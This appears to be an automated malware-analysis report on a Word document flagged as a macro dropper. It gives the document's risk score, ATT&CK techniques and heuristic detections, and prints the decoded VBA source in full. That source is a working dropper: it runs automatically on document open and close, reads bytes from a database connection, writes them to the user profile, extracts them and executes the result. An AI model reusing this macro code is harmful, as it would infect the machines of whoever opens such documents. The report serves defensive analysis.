MALICIOUS
270
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open subroutine, which is a common technique for executing malicious code upon opening a document. The macro uses `Shell()` to execute a file path constructed from environment variables and embedded text, indicating a downloader or dropper functionality. The `CreateObject("Shell.Application")` call further suggests manipulation of the system environment to execute payloads.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-7181777-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-7181777-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3079 bytes |
SHA-256: de70345a34c416da48c59477e1790aebce37c9f56e39c564354481b11457f733 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "NewWordDoc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Dim Path As Variant
Path = Environ$("USERPROFILE") & Setteins_Frm.Unpath_txt.Text
Dim fILEzz As String
fILEzz = Path & Setteins_Frm.Name_txt.Text
Dim RetVal
RetVal = Shell(fILEzz, 1)
End Sub
Private Sub Document_Open()
TextLoder_Frm.Bits_txt.Text = Conjuction("Select * from Data where Id_No = 4", 1)
Setteins_Frm.Spliterzz
TextLoder_Frm.COnverttbitzz
End Sub
Public Function Conjuction(Command As String, Ind As Integer) As String
Dim Coonaction As ADODB.Connection
Dim ResssData As ADODB.Recordset
Dim StrConn As String
StrConn = Setteins_Frm.Con_txt.Text
Set Coonaction = New ADODB.Connection
Coonaction.Open StrConn
Set ResssData = Coonaction.Execute(Command)
Conjuction = ResssData.Fields(Ind).Value
End Function
Attribute VB_Name = "BitzzHolder"
Public Function UnBitzzz()
Dim Unzz As Variant
Dim Pathzz As Variant
Dim ShellAppzz As Object
Unzz = Environ$("USERPROFILE") & Setteins_Frm.Unpath_txt.Text
Pathzz = Environ$("USERPROFILE") & NewWordDoc.Conjuction("Select * from Name", 1)
Set ShellAppzz = CreateObject("Shell.Application")
ShellAppzz.Namespace(Unzz).CopyHere ShellAppzz.Namespace(Pathzz).Items
End Function
Attribute VB_Name = "Holder"
Public DataStr() As String
Public BitzArry() As Byte
Attribute VB_Name = "Setteins_Frm"
Attribute VB_Base = "0{10B87DAF-FE64-40B2-A605-5337D99EB52B}{0247BF34-AE0F-4B0E-A988-F641D1A6F9C5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function Spliterzz()
Dim Array_bt() As String
Dim Bt As String
Bt = TextLoder_Frm.Bits_txt.Text
Array_bt = Split(Bt, "!")
Holder.DataStr = Array_bt
End Function
Private Sub UserForm_Click()
End Sub
Attribute VB_Name = "TextLoder_Frm"
Attribute VB_Base = "0{D79C8270-1FFD-4898-9584-C3D70A4FA634}{FC555986-2D45-499E-9922-0EEE7D545EFA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function COnverttbitzz()
Dim Idz As Double
Idz = 0
Dim F_Bytzz() As Byte
For Each dit In Holder.DataStr
ReDim Preserve F_Bytzz(Idz)
F_Bytzz(Idz) = CByte(dit)
Idz = Idz + 1
Next
Holder.BitzArry = F_Bytzz
Dim patds As String
patds = Environ$("USERPROFILE") & Setteins_Frm.Path_txt
Open patds For Binary Access Write As #1
Put #1, , Holder.BitzArry
Close 1
BitzzHolder.UnBitzzz
End Function
Private Sub Bits_txt_Change()
End Sub
Private Sub UserForm_Click()
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.